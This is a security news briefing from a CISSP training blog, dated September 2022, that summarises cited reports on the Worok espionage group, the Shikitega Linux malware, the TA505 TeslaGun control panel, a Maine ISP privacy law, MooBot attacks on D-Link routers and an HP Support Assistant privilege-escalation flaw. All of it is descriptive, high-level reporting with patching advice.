Les Bell

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Cyberespionage Group Worok Target SE Asia Companies, Governments

A previously-unknown threat group, named Worok by the ESET researchers who discovered and investigated them, has been targeting high-profile companies and government, mostly in Asia. Analysis of previously-obtained telemetry data suggests the group was active in late 2020 but then went quiet until February 2022; they seem to be engaged in cyberespionage, stealing information rather than deploying ransomware or attempting extortion, and their targets are quite diverse, including a telecom, a bank, a maritime company, a government entity in the Middle East and even a company in southern Africa.

The group gains initial access via the ProxyShell vulnerability, which allows them to install web shells in order to persist in the victim's network. From there, a variety of implants are used. The group's reconnaisance tools include Mimikatz, Earthwork, ReGeorg and NBTscan, and from there they use a first-stage loader to pull down a .NET loader called PNGLoad, which extracts a steganographically-hidden PowerShell script from a PNG image.

The loaders are all heavily obfuscated, with multiple stages of decryption and unpacking before they execute, and analysis indicates that the Worok group develops its own tools, although it may share some with an earlier APT called TA428.

Passilly, Thibaut, Worok: The big picture, ESET WeLiveSecurity blog, 6 September 2022. Available online at https://www.welivesecurity.com/2022/09/06/worok-big-picture/.

Shikitega Stealth Malware Targets Linux

A new piece of malware, targeting Linux computers, including IoT devices, has been discovered by AT&T Alien Labs and christened 'Shikitega'. What is interesting about this particular malware is the stealthy way it downloads and installs in multiple stages; each stage is quite small - typically only a few hundred bytes, which performs some small task, then downloads and runs the next stage. At the culmination of the process, Shikitega installs a Monero cryptominer, but retains full control of the victim.

Along the way, the malware downloads and uses the Metasploit 'Mettle' meterpreter, and uses multiple cycles of XOR decoding to deobfuscate its final payload shellcode, which uses the execve() syscall to execute (you guessed it) /bin/sh, passing it commands received from its C2 server. To persist in the system, it also downloads 5 shell scripts. setting four crontab entries - two for the currently logged in user and two for root. If necessary, it will install crond and start it.

Caspi, Ofer, Shikitega - New stealthy malware targeting Linux, AT&T blog, 6 September 2022. Available online at https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux.

Control Panel Manages ServHelper Back Doors

The days when hackers used IRC (Internet Relay Chat) as their command and control channel, with simple text commands, are long gone; these days, the bad guys use sophisticated dashboards and control panels to manage their assets (actually, your assets).

The Evil Corp ransomware gang (also known as TA505) has long used a piece of backdoor malware called ServHelper, which it uses to deploy a variety of payloads such as cryptominers and ransomware, mainly against the US finance sector, although other industries and countries are also targeted. As this and similar groups have scaled up their operations, managing multiple campaigns became increasingly difficult, especially when a single phishing campaign can target thousands of victims. Evil Corp's solution to this problem is a sophisticated control panel called 'TeslaGun'.

A single instance of TeslaGun can manage multiple campaigns with different delivery methods and attack data. Generally the payloads require no interaction, but the control panel does allow remote control via RDP and VNC connections, and other software can be dropped on the victims' machines. The C2 servers for the control panel are mainly located in a single data center in Moldova, although they keep changing IP addresses to evade detection.

PTI Team, TA505 Group's TeslaGun In-Depth Analysis, Prodaft, 5 September 2022. Available online at https://www.prodaft.com/resource/detail/ta505-ta505-groups-tesla-gun-depth-analysis.

Maine Privacy Law Survives Legal Challenge

In 202, the US state of Maine introduced one of the tightest privacy laws in the US for internet service providers, in the form of an 'opt in' web privacy standard. This stops ISP's from using, disclosing, selling or providing access to customers' personal information without permission.

Almost immediately, industry associated sued, claiming that the new law violated their First Amendment rights. A federal judge rejected this argument, but industry groups hired a veritable "army of industry lawyers" to challenge the law. However, the groups have now dropped their suit and agreed to pay the state's costs of $US55,000 (which seem quite low, to this writer).

Whittle, Patrick, Internet service providers drop challenge of privacy law, AP News, 6 September 2022. Available online at https://apnews.com/article/technology-lawsuits-united-states-maine-data-privacy-9b2a40a18839c16df732368ee04ea856.

Mirai Variant Targets D-Link Routers

While D-Link products are rarely used in the enterprise, they are popular with home users, and the trend to hybrid work and telecommuting means that compromised devices belonging to employees can represent an exposure for the employer. Now a derivative of the notorious Mirai botnet, called Moobot, is targeting vulnerable D-Link routers with a combination of old and new exploits.

First discovered by Fortinet in December 2021, Moobot was then targeting Hikvision CCTV cameras to recruit into its DDoS botnet. However, it has now switched to targeting D-Link devices via a range of RCE vulnerabilities. Although D-Link has released patches for these vulnerabilities, home users are notoriously lax about patching their devices. Although Moobot simply uses the RCE capability to install their DDoS malware, it obviously has the capability to do a lot more, and so enterprise security personnel may have to encourage employees to install the relevant patches.

Zhang, Chao Zhibin, Cecilia Hu and Aveek Das, Mirai Variant MooBot Targeting D-Link Devices, Palo Alto Networks, 6 September 2022. Available online at https://unit42.paloaltonetworks.com/moobot-d-link-devices/.

HP Laptop Utility Hosts CVSS 8.2 Vulnerability

Major supplier Hewlett-Packard has disclosed a serious vulnerability in the HP Support Assistant which is preloaded on its laptops. CVE-2022-38395 is a DLL search path vulnerability in Fusion, which the utility uses to launch its HP Performance Tune-up function. The function requires admin privileges, and by placing a DLL in the right directory, an attacker is able to achieve a privilege escalation attack.

Users are advised to update to HP Support Assistant version 9.11 or later and Fusion version 1.38.2601.0 or later.

HP Customer Support, Privilege escalation in HP Support Assistant, Knowledge Base article, 6 September 2022. Available online at https://support.hp.com/us-en/document/ish_6788123-6788147-16/hpsbhf03809.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.